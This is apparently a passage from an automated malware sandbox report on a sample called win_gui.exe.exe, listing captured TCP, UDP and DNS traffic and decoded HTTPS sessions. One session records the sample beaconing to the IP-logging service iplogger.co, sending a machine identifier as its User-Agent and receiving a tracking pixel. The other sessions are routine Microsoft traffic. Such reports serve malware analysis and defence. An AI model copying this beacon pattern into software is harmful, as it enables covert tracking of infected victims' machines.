                                Dec 3, 2024 17:53:15.800393105 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.852499008 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.852529049 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.852655888 CET50226443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.852696896 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.853010893 CET50226443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.853017092 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.853041887 CET50226443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.853216887 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.853252888 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.853895903 CET50226443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.856146097 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.856198072 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.856270075 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.856430054 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.856446981 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.232522011 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.233046055 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.233072996 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.233552933 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.233558893 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.303380013 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.303411007 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.303427935 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.303555012 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.303586960 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.303869009 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545521021 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.545536041 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.545593977 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.545671940 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545695066 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.545727015 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545758963 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545922041 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545937061 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.545948029 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545953035 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.549520969 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.549566031 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.549683094 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.549844027 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.549860001 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.708795071 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.709372997 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.709395885 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.709884882 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.709889889 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771341085 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771373987 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771435022 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.771456957 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771657944 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.771707058 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.771712065 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771745920 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.771907091 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771938086 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.772465944 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.774745941 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.774799109 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.774868011 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.775048018 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.775064945 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.041941881 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.043332100 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.043360949 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.043829918 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.043834925 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.160965919 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.160994053 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.161133051 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.161161900 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.161417007 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.161432981 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.161447048 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.161624908 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.161662102 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.161735058 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.164757013 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.164804935 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.164910078 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.165080070 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.165095091 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.487477064 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.490688086 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.490808010 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.490855932 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.490855932 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.490875959 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.490895033 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.493937969 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.493990898 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.494071007 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.494229078 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.494240999 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.660793066 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.661478996 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.661509037 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.661976099 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.661981106 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.107721090 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.107799053 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.108066082 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.108112097 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.108131886 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.108144045 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.108151913 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.111323118 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.111371994 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.111440897 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.111619949 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.111634970 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.280844927 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.281358004 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.281388998 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.281877995 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.281887054 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.669297934 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.670022964 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.670054913 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.670528889 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.670536041 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.791580915 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.791764021 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.792058945 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.792102098 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.792120934 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.792138100 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.792143106 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.795203924 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.795244932 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.795325994 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.795520067 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.795530081 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.980015039 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.980806112 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.980833054 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.981300116 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.981304884 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.128592014 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.131669998 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.131793976 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.131839991 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.131839991 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.131866932 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.131877899 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.135129929 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.135157108 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.135379076 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.135534048 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.135543108 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.300656080 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.301749945 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.301781893 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.302228928 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.302234888 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.438822031 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.438857079 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.438909054 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.447321892 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.453015089 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.453421116 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.453440905 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.453479052 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.453490019 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.746217966 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.749439955 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.755326033 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.756763935 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.779175043 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.779196024 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.779206038 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.779211998 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.022026062 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.072073936 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.076517105 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.076529026 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.083787918 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.083801031 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.477446079 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.480642080 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.480720043 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.480767012 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.480767012 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.480791092 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.480804920 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.624536991 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.625200987 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.625231028 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.625782013 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.625787020 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.915091991 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.915667057 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.915685892 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.916192055 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.916197062 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.060758114 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.063894987 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.063981056 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.064032078 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.064032078 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.064052105 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.064060926 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.382250071 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.382312059 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.382374048 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.382673025 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.382684946 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.382695913 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.382700920 CET4435023813.107.246.63192.168.2.5

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 3, 2024 17:50:48.802030087 CET5733453192.168.2.51.1.1.1
                                Dec 3, 2024 17:50:49.294878960 CET53573341.1.1.1192.168.2.5
                                Dec 3, 2024 17:50:49.599678993 CET62850274192.168.2.5192.168.2.1
                                Dec 3, 2024 17:54:31.763848066 CET138138192.168.2.5192.168.2.255

                                ICMP Packets

                                TimestampSource IPDest IPChecksumCodeType
                                Dec 3, 2024 17:50:49.599752903 CET192.168.2.1192.168.2.5830c(Port unreachable)Destination Unreachable

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 3, 2024 17:50:48.802030087 CET192.168.2.51.1.1.10x7972Standard query (0)iplogger.coA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 3, 2024 17:50:49.294878960 CET1.1.1.1192.168.2.50x7972No error (0)iplogger.co172.67.167.249A (IP address)IN (0x0001)false
                                Dec 3, 2024 17:50:49.294878960 CET1.1.1.1192.168.2.50x7972No error (0)iplogger.co104.21.82.93A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • beginuser-agent:
                                  • iplogger.co
                                • fs.microsoft.com
                                • otelrules.azureedge.net
                                • slscr.update.microsoft.com
                                • enduser-agent:

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549959172.67.167.2494431864C:\Users\user\Desktop\win_gui.exe.exe
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:50:50 UTC142OUTGET /155qJ4.torrent HTTP/1.1
                                Referer: BEGIN
                                User-Agent: 391467B9-BD4E-2B74-71A6-03A3DA3DE322
                                Host: iplogger.co
                                Cache-Control: no-cache
                                2024-12-03 16:50:51 UTC1357INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:50:51 GMT
                                Content-Type: image/png
                                Transfer-Encoding: chunked
                                Connection: close
                                memory: 0.6112594604492188
                                expires: Tue, 03 Dec 2024 16:50:51 +0000
                                Cache-Control: no-store, no-cache, must-revalidate
                                strict-transport-security: max-age=604800
                                strict-transport-security: max-age=31536000
                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                x-frame-options: SAMEORIGIN
                                CF-Cache-Status: BYPASS
                                Set-Cookie: 55593078137264100=3; expires=Wed, 03 Dec 2025 16:50:51 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                Set-Cookie: clhf03028ja=8.46.123.228; expires=Wed, 03 Dec 2025 16:50:51 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qctmF3wksDZQnsG5W1PoAQeYH6CDd5i7z5NTdZ%2Box4e30OAK0ja%2Bvi2NxMn5jaFQokh7TlYJu64eKtLXeIDspDL7jBK%2FOyGKzc0s5c9tmuglsJmA%2FYVydTjnXBKLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8ec50edced5d80d9-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=79167&min_rtt=4789&rtt_var=46149&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=780&delivery_rate=609730&cwnd=252&unsent_bytes=0&cid=7a32f3549aa0f5bc&ts=852&x=0"
                                2024-12-03 16:50:51 UTC12INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a
                                Data Ascii: 74PNG
                                2024-12-03 16:50:51 UTC110INData Raw: 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                Data Ascii: IHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                2024-12-03 16:50:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.54996323.218.208.109443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:50:55 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                Accept-Encoding: identity
                                User-Agent: Microsoft BITS/7.8
                                Host: fs.microsoft.com
                                2024-12-03 16:50:55 UTC479INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Server: Kestrel
                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                X-Ms-ApiVersion: Distribute 1.2
                                X-Ms-Region: prod-weu-z1
                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                X-OSID: 2
                                X-CID: 2
                                X-CCC: GB
                                Cache-Control: public, max-age=162393
                                Date: Tue, 03 Dec 2024 16:50:55 GMT
                                Connection: close
                                X-CID: 2


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.54996423.218.208.109443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:50:57 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                Accept-Encoding: identity
                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                Range: bytes=0-2147483646
                                User-Agent: Microsoft BITS/7.8
                                Host: fs.microsoft.com
                                2024-12-03 16:50:58 UTC534INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                ApiVersion: Distribute 1.1
                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                Cache-Control: public, max-age=69266
                                Date: Tue, 03 Dec 2024 16:50:58 GMT
                                Content-Length: 55
                                Connection: close
                                X-CID: 2
                                2024-12-03 16:50:58 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                Session IDSource IPSource PortDestination IPDestination Port
                                3192.168.2.54996613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:06 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:07 UTC471INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:06 GMT
                                Content-Type: text/plain
                                Content-Length: 218853
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public
                                Last-Modified: Fri, 29 Nov 2024 23:15:49 GMT
                                ETag: "0x8DD10CBC2E3B852"
                                x-ms-request-id: 82d9e4b2-501e-007b-3a87-435ba2000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165106Z-174f78459685m244hC1EWRgp2c0000001640000000003q5w
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:07 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                2024-12-03 16:51:07 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                2024-12-03 16:51:07 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
